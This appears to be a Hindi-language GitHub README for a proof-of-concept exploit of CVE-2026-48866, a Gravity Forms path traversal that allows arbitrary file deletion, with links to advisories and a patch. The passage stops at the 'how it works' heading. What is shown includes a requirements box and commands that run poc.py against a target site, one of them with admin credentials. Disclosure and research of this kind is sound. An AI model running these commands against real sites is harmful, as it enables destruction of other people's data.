
CVE-2026-48866 — Gravity Forms <= 2.10.0.1 पाथ ट्रैवर्सल के माध्यम से मनमाना फ़ाइल विलोपन (CVSS 9.6)
---``` ┌───────────────────────────────────────────────────────────┐ │ │ │ C V E - 2 0 2 6 - 4 8 8 6 6 │ │ │ │ Gravity Forms Path Traversal → Arbitrary File Deletion │ │ │ └───────────────────────────────────────────────────────────┘
<h3 align="center">
<code>gform_uploaded_files</code> URLs में <code>../</code> स्वीकार करता है। एडमिन का डिलीट क्लिक मनमाना फ़ाइल विलोपन ट्रिगर करता है।
</h3>
<p align="center">
<a href="https://nvd.nist.gov/vuln/detail/CVE-2026-48866">NVD</a> •
<a href="https://patchstack.com/database/wordpress/plugin/gravityforms/vulnerability/wordpress-gravity-forms-plugin-2-10-0-1-arbitrary-file-deletion-vulnerability">Patchstack</a> •
<a href="https://github.com/codewurker/gravityforms/commit/cf2ff65133d581cfed1c308adc1621c3af1f8422">पैच किया गया कमिट</a> •
<a href="https://github.com/codewurker/gravityforms">स्रोत मिरर</a>
</p>
---
## विषय सूची
<table>
<tr>
<td width="50%">
**एक्सप्लॉइट**
- [त्वरित शुरुआत](#quick-start)
- [यह कैसे काम करता है](#how-it-works)
- [प्रभाव](#impact)
- [उपयोग](#usage)
</td>
<td width="50%">
**रक्षा**
- [तकनीकी गहराई](#technical-deep-dive)
- [पहचान](#detection)
- [सुधार](#remediation)
- [संदर्भ](#references)
</td>
</tr>
</table>
---
## त्वरित शुरुआत```
┌─────────────────────────────────────────────────────────────────────┐
│ REQUIREMENTS │
│ ─────────────────────────────────────────────────────────────── │
│ Target WordPress + Gravity Forms ≤ 2.10.0.1 │
│ Form Public form with a file upload field │
│ Python 3.8+ with requests │
│ Auth None (injection) / Admin creds (trigger) │
└─────────────────────────────────────────────────────────────────────┘
`man````bash git clone https://github.com/0xABCD01/CVE-2026-48866.git cd CVE-2026-48866 pip install requests
python3 poc.py -t https://test.com -f 1 -i 3
python3 poc.py -t https://test.com -f 1 -i 3 --trigger --admin-user admin --admin-pass 'P@ssw0rd'
---
## यह कैसे काम करता है